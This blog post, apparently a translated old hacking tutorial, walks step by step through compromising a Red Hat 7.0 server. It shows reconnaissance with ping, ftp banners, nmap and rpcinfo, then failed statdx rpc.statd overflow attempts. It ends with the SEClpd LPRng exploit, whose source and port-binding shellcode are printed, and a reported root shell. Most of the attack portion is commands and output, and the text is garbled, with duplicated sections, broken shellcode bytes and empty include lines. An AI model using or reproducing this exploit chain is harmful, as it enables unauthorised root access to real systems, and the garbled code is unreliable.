How 👨‍💻 hackers invade 🐧 Linux

How 👨‍💻 hackers invade 🐧 Linux

Today is Valentine’s Day, and I wish all lovers to be married, and I wish everyone a happy Valentine’s Day! But pay attention to safety at all times. Now let me talk about how to see how hackers have invaded Linux:

The purpose of this article is not to teach people to invade, but to improve their own technology and strengthen the security awareness of network administrators. That’s it! Careless network administrators should understand: A small operating error of yours may lead to the complete fall of the entire network! This article is mainly centered on the LPD: attack on the network printing service.

First determine the target, assuming it is: www.XXX.com

Let me see if I can connect:   

C:\ping www.XXX.com
  Pinging www.XXX.com[202.106.184.200] with 32 bytes of data:
  Reply from 202.106.184.200: bytes=32 time=541ms TTL=244
  Reply from 202.106.184.200: bytes=32 time=620ms TTL=244
  Reply from 202.106.184.200: bytes=32 time=651ms TTL=244
  Reply from 202.106.184.200: bytes=32 time=511ms TTL=244
  Ping statistics for 202.106.184.200:
  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
  Approximate round trip times in milli-seconds:
  Minimum = 511ms, Maximum = 651ms, Average = 580ms
  Hee hee—not only can it be connected, but the speed is good...
  First telnet to see the banner:
        C:\>telnet www.XXX.com

Hee hee – not only can it be connected, but the speed is good…

First telnet to see the banner: C:>telnet www.XXX.com

The connection to the host is lost.

Try ftp again



C:\>ftp www.XXX.com
  Connected to www.fbi.gov.tw.
  220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.
        User (www.XXX.com:(none)):

wu-2.6.1 seems a little bit eye-catching. This machine looks like RedHat7.0! First of all, you must confirm it, and connect to my springboard:

C:\>telnet xxx.xxx.xxx.xxx
  Red Hat Linux release 7.0 (Guinness)
  Kernel 2.2.16-22smp on an i686
  login: fetdog
  Password:
        bash-2.04$

 Take the nmap scanner to see the mystery~~~


The following is a quoted snippet:
 bash-2.04 $ nmap -sT -O www.XXX.com
  Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
  WARNING! The following files exist and are readable: /usr/local/sha
  -services and ./nmap-services. I am choosing /usr/local/share/nmap/
  s for security reasons. set NMAPDIR=. to give priority to files in
  irectory
  Interesting ports on (www.XXX.com):
  (The 1520 ports scanned but not shown below are in state: closed)
  Port State Service
  25/tcp open smtp
  79/tcp open finger
  80/tcp open http
  111/tcp open sunrpc
  113/tcp open auth
  443/tcp open https
  513/tcp open login
  514/tcp open shell
  515/tcp open printer
  587/tcp open submission
  1024/tcp open kdm
  TCP Sequence Prediction: positive increments
  Difficulty=3247917 (Good luck!)
  Remote operating system guess: Linux 2.1.122 - 2.2.16
        Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds

There are quite a lot of open ports, which means that the possibility of intrusion increases. 79/tcp open finger, take a look at this first, but Linux does not have a loophole in the finger user list.

bash-2.04$finger @www.XXX.com
  [www.XXX.com]
        No one logged on.

Look at 111/tcp open sunrpc again. Recently, rpc vulnerabilities have become popular. I don’t know if RH7 will have this stuff? Let’s take a look first!

The following is a quoted snippet:
 bash-2.04$rpcinfo -p www.XXX.com
  program vers proto port service
  100000 2 tcp 111 rpcbind
  100000 2 udp 111 rpcbind
  100021 1 udp 1024 nlockmgr
  100021 3 udp 1024 nlockmgr
  100024 1 udp 1025 status
        100024 1 tcp 1024 status

It seems that there is rpc.statd service. Let’s see if we can remotely overflow and get a rootshell.

bash-2.04$./statdx -h
  statdx by ron1n
  Usage: stat [-t] [-p port] [-a addr] [-l len]
  [-o offset] [-w num] [-s secs] [-d type]
  -t attack a tcp dispatcher [udp]
  -p rpc.statd serves requests on [query]
  -a the stack address of the buffer is
  -l the length of the buffer is [1024]
  -o the offset to return to is [600]
  -w the number of dwords to wipe is [9]
  -s set timeout in seconds to [5]
  -d use a hardcoded
  Available types:
  0 Redhat 6.2 (nfs-utils-0.1.6-2)
  1 Redhat 6.1 (knfsd-1.4.7-7)
  2 Redhat 6.0 (knfsd-1.2.2-4)
  It does not seem to support RH7. Still continue to try, try all 0-2! start……
  bash-2.04$stat -d 0 www.XXX.com
  buffer: 0xbffff314 length: 999 (+str/+nul)
  target: 0xbffff718 new: 0xbffff56c (offset: 600)
  wiping 9 dwords
  Failed - statd returned res_stat: (failure) state: 21
  Frustrated, try again...
  bash-2.04$stat -d 1 www.XXX.com
  buffer: 0xbffff314 length: 999 (+str/+nul)
  target: 0xbffff718 new: 0xbffff56c (offset: 600)
  wiping 9 dwords
  Failed - statd returned res_stat: (failure) state: 21

The same continue

The following is a quoted snippet:
 bash-2.04$stat -d 1 www.XXX.com
  buffer: 0xbffff314 length: 999 (+str/+nul)
  target: 0xbffff718 new: 0xbffff56c (offset: 600)
  wiping 9 dwords
        Failed - statd returned res_stat: (failure) state: 21

rpc.statd does not work, think about RH7 there should be a remote overflow, it seems to be caused by the lp service. “Seclpd.c” should be this stuff.

The following code is for teaching use only and should not be used for malicious attacks.

/*
  * Welcome to http://hlc.cnroot.com/
  * Run: ./SEClpd victim brute -t type
  * Try first ./SEClpd victim -t 0 then try the brute.
  */
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #define ADDRESS_BUFFER_SIZE 32+4
  #define APPEND_BUFFER_SIZE 52
  #define FORMAT_LENGTH 512-8
  #define NOPCOUNT 200
  #define SHELLCODE_COUNT 1030
  #define DELAY 50000 /* usecs */
  #define OFFSET_LIMIT 5000
  char shellcode[] =
  "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
  "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
  "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
  "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
  "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
  "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
  "\ xb2 \ x3f \ x89 \ xd0 \ xcd \ x80 \ x89 \ xd0 \ x41 \ xcd \ x80 \ xeb \ x18 \ x5e \ x89 \ x75"
  "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
        "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

brute brute force. After waiting for 5-8 minutes, the result came out.

- [+] shell located on www.XXX.com
- [+] Enter Commands at will
Linux XXX.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown uid=0(root) gid=7(lp)

    uid=0 (root privileges), now you can invade further! But don’t do bad things! 

bash-2.04$stat -d 1 www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

rpc.statd does not work, think about RH7 there should be a remote overflow, it seems to be caused by the lp service. “Seclpd.c” should be this stuff.

whoami
Stefan Pejcic
Join the discussion

I enjoy constructive responses and professional comments to my posts, and invite anyone to comment or link to my site.